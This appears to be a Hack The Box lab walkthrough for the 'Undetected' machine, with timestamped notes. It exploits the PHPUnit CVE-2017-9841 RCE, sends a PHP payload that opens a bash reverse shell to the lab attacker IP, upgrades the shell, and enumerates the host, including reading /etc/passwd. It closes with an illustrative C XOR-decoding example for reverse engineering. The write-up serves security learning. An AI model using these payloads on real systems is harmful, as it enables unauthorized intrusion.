Hack the Box : Undetected


Reading C code was hard.

00:45 PHP Unit vulnerability found

OffSec’s Exploit Database Archive
PHPUnit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated). CVE-2017-9841. webapps exploit for the PHP platform
https://github.com/vulhub/vulhub/blob/master/phpunit/CVE-2017-9841/README.md

01:14 Modify the request in Burp Suite to show phpinfo()

Content-Type: application/x-www-form-urlencoded
<?=phpinfo()?>

01:42 Sending a reverse shell instead of phpinfo()

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>

01:50 Reverse shell successful; upgrade it to a proper TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

02:03 Looking for privilege escalation

ss (socket statistics) is a CLI tool that shows socket and network statistics

ss -lntp
ss -ant
ss -ntp

02:09 Try to find files the current user owns

find / -user www-data 2>/dev/null | grep -v '/proc\|/run\|/var/www'

02:28 Investigate the executable that was found

strings lists the printable character sequences found inside a binary file

CyberChef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

02:57 Check /etc/passwd for users with a login shell

cat /etc/passwd | grep 'sh$'

03:35 Try to find suspicious files by timestamp (modification times with zero fractional seconds or set to exactly midnight, which suggests a timestamp that was set by hand)

find / -type f -printf "%T+ %p\n" 2>/dev/null | grep 000000 | grep -v '/sys\|/proc\|/run'
find / -type f -printf "%T+ %p\n" 2>/dev/null | grep 00:00:00 | grep -v '/sys\|/proc\|/run'

04:17 Reading C code. Reverse Engineering.

strcmp() compares two strings character by character and returns 0 if they are equal.

The ^ (bitwise XOR) operator in C or C++ takes two numbers as operands and XORs them bit by bit; each result bit is 1 only if the two input bits differ. XOR is its own inverse, so applying the same key twice restores the original value, which is why it is a common way to hide strings in a binary.

(byte *) is a cast that tells the decompiler (and the reader) to interpret this pointer as a pointer to byte data, so that the loop is walking raw bytes rather than a typed structure.
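The three items above (strcmp(), ^, and the (byte *) cast) are the building blocks of a typical XOR-decode-then-compare routine. The following is an added example written for this page, not the binary from the box: a constructed blob obfuscated with a repeating two-byte key, the check routine in the shape the decompiler would show, and the small decoder an analyst writes to recover the hidden string without executing the binary. The key, the blob and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample (not the box's binary): the string "secret" XORed
 * with the repeating 2-byte key {0x5A, 0x13}. Both values are hypothetical. */
static const unsigned char g_key[]  = {0x5A, 0x13};
static const unsigned char g_blob[] = {0x29, 0x76, 0x39, 0x61, 0x3F, 0x67};
#define BLOB_LEN (sizeof g_blob)

/* XOR n bytes of `in` with a repeating key into `out` and NUL-terminate it.
 * `out` must hold n + 1 bytes. Because XOR is its own inverse, the same
 * routine obfuscates and deobfuscates. */
void xor_decode(const unsigned char *in, size_t n,
                const unsigned char *key, size_t keylen, char *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (char)(in[i] ^ key[i % keylen]);
    out[n] = '\0';
}

/* The pattern the notes describe: decode the hidden string at runtime and
 * strcmp() it against the caller's input. strcmp() returning 0 means match.
 * Treating the blob as (unsigned char *) is what the (byte *) cast in the
 * decompiled output expresses. Returns 1 on match, 0 otherwise. */
int check_secret(const char *candidate)
{
    char plain[BLOB_LEN + 1];
    xor_decode(g_blob, BLOB_LEN, g_key, sizeof g_key, plain);
    return strcmp(plain, candidate) == 0;
}

/* Analyst helper: once the loop has been read, recover the string directly
 * from the embedded bytes and key. Returns NULL if `buf` is too small. */
const char *recover_secret(char *buf, size_t buflen)
{
    if (buflen < BLOB_LEN + 1)
        return NULL;
    xor_decode(g_blob, BLOB_LEN, g_key, sizeof g_key, buf);
    return buf;
}

int main(void)
{
    char buf[BLOB_LEN + 1];
    printf("recovered: %s\n", recover_secret(buf, sizeof buf));
    printf("check(\"secret\") = %d\n", check_secret("secret"));
    printf("check(\"wrong\")  = %d\n", check_secret("wrong"));
    return 0;
}
```

In a real binary the key and blob are read out of the data section (strings will not show the plaintext, which is the point of the obfuscation), and the decoder is fed those bytes; the loop structure is the same whatever the key length.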